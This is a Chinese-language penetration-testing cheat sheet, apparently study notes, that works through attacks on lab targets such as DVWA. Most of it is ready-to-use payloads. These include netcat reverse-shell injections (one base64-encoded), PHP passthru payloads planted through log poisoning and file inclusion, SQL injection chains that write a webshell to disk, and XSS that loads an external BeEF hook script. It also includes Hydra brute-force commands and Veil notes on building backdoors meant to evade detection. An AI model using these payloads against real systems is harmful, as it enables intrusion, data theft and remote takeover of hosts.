渗透测试常见技术
1.信息收集
IP address
domain name info
technologies used
other websites on the same server
dns records
unlisted files,sub-domains,diretories
主要工作:whois查询网站详细信息,扫描子域,扫描目录查看敏感信息
较多为国外网站,若不能访问建议翻墙试试。
http://whois.domaintools.com
http://toolbar.netcraft.com/site_report?url=
https://www.robtex.com
2.文件上传
连接后门的基础,必须知道文件存放的地址。
weevly generate [password] [file name] ———生成php类型的后门文件
weevly [url to file][password] ———连接后门文件
三种情况
1)直接上传后台代码
2)绕过检测文件格式,通过burpsuite抓包将修改文件后缀 filename.php->filename.jpg filename.jpg->filename.php
3)同样是抓请求包,filename.jpg -> filename.php.jpg
3.代码执行
网站窗口跟commond有关系的,linux系统可以使用;| 来运用代码执行进行提权
eg:
20.20.10.223;nc -e /bin/sh nc_server_ip port
20.20.10.223|nc -e /bin/sh nc_server_ip port
提权代码
nc -vv -l -p 8080 —–用来监听端口
4.本地、远程文件包含
存在文件包含的链接地址?page=/../../../../../etc/passwd
http://192.168.101.3/dvwa/vulnerablities/fi/?page=/../../../../../etc/passwd
/proc/self/environ
/var/log/auth.log
/var/log/apache2/access.log
http://192.168.101.3/dvwa/vulnerablities/fi/?page=/../../../../../proc/self/environ
通过burpsuite抓包,修改用户代理User-Agent:<?phpinfo();?>
User-Agent:<?passthru(“nc -e /bin/sh 192.168.101.3 8888”);?>
http://192.168.101.3/dvwa/vulnerablities/fi/?page=/../../../../../var/log/auth.log
ssh”<?passthru(“nc -e /bin/sh 192.168.101.3 8888”);?>”@192.168.101.3(被攻击的对象)
攻击机监听端口nc -vv -l -p 8888
ssh “<?passthru(base64_decode(‘bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjEwMS4zIDg4ODg=’));?>”@192.168.101.3
远程文件包含
一定确保php.ini文件中的allow_url_include=On
创建一个文件包含<?passthru(“nc -e /bin/sh 192.168.101.3 8888”);?>代码的文件,且能够远程访问。
之后将文件远程包含到被攻击机代码如下
http://192.168.101.3/dvwa/vulnerablities/fi/?page=http://ip+文件目录地址
5.Sql injection
adminpass’ and 1=1#
monkey’ and 1=1#
monkey’ or 1=1 #
index.php?page=user-info.php&username=admin’ order by 1#&password=adminpass&user-info-php-submit-button=View+Account+Details
union select 1,2,3,4,5
union select 1,database(),user(),version(),5
union select 1,table_name,null,null,5 from information_schema.tables where table_schema = “metasploit”
union select 1,column_name,null,null,5 from information_schema.columns where table_name = “accounts”
union select 1,cid,username,password,5 from accounts
union select table_name,2 from information_schema.tables where table_schema = ‘dvwa’
union select column_name,2 from information_schema.columns where table_name = ‘users’
medium:–会过滤‘
union select table_name,2 from information_schema.tables where table_schema=0x64767761
1’+uNion/**/sEleCt/**/1,2/**/%23
1’+uNion/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23
1’+uNion/**/sEleCt/**/table_name,2+fRom+information_schema.tables+limit+0,1%23
1’+uNion/**/sEleCt/**/table_name,2+fRom+information_schema.tables+where+table_schema=’dvwa’+limit+0,1%23
SQL injection read_write_file:
union select null,load_file(“/etc/passwd”),null,null,null
union select null,’example example’,null,null,null into outfile ‘/var/www/mutillidae/example.txt’
write:union select ‘<?passthru(“nc -e /bin/sh 192.168.101.71 8080”);?>’,null into outfile ‘/tmp/reverse.php’
union select ‘<?passthru(“nc -e /bin/sh 192.168.101.71 8080”);?>’,null into outfile ‘/var/www/dvwa/reverse.php’
tool 功能介绍:
sqlmap -u “….” –os-shell
sqlmap -u “….” –sql-shell
如果是get型号,直接,sqlmap -u “诸如点网址”
如果是post型诸如点,可以sqlmap -u “注入点网址” – data=”post的参数”
如果是cookie,X-Forwarded-For等,可以访问的时候,用burpsuite抓包,注入处用*号替换,放到文件里,然后sqlmap -r “文件地址”
6.xss
存储型xss、反射型xss、dom xss
low :
直接<script>alert(‘xss’)</script>
<a onmouseover=”alert(‘xss’)”>xss link</a>
<IMG SRC=# onmouseover=”alert(‘xss’)”>
<IMG SRC=# onerror=”alert(‘xss’)”></IMG>
medium :可以调整一下标签的大小写<sCripT>alert(‘xss’)</scrIpt>
<script>alert(String.fromCharCode(120,115,115,50))</script>
<script>alert(String.fromCharCode(xsss))</script>
使用beef:
“参数”=<script src = “http://192.168.101.71:3000/hook.js”></script>
http://192.168.101.72/dvwa/vulnerabilities/xss_r/?name=admin#
http://192.168.101.72/dvwa/vulnerabilities/xss_r/?name=<script src=”http://192.168.101.71:3000/hook.js”></script>#
veil工具的使用: ——–生成无法检测的后门 工具安装未完成
1)evasion
2)ordnance
use 1 ———-几个重要的工具
go/meterpreter/rev_http.py
go/meterpreter/rev_https.py
go/meterpreter/rev_tcp.py
lua/shellcode_inject/flat.py
最终植入方式检测到的veil工具制作的后门
7.csrf
修改密码利用cookie发送挂载的隐藏代码的链接
使用令牌将数据隐藏到用户访问的网站,只要用户提交,将自动修改密码
8.暴力破解
密码生成工具:kali中的crunch
暴力破解工具:hydra
hydra -l user -P passlist.txt ftp://192.168.0.1 http-post-form “/login.php:user=^USER^&pass=^PASS^:incorrect”
注意:大写参数表示使用字典,小写使用是特定字符(-l user–用户名是user;-L passlist.txt)
9.webshell
文件上传,文件包含,代码执行
代码执行:
kali中监听:nc -vv -l -p 8080
客户端:;或者 | nc -e /bin/sh “url” “port”
主要使用工具:冰蝎、菜刀、哥斯拉、蚁剑等。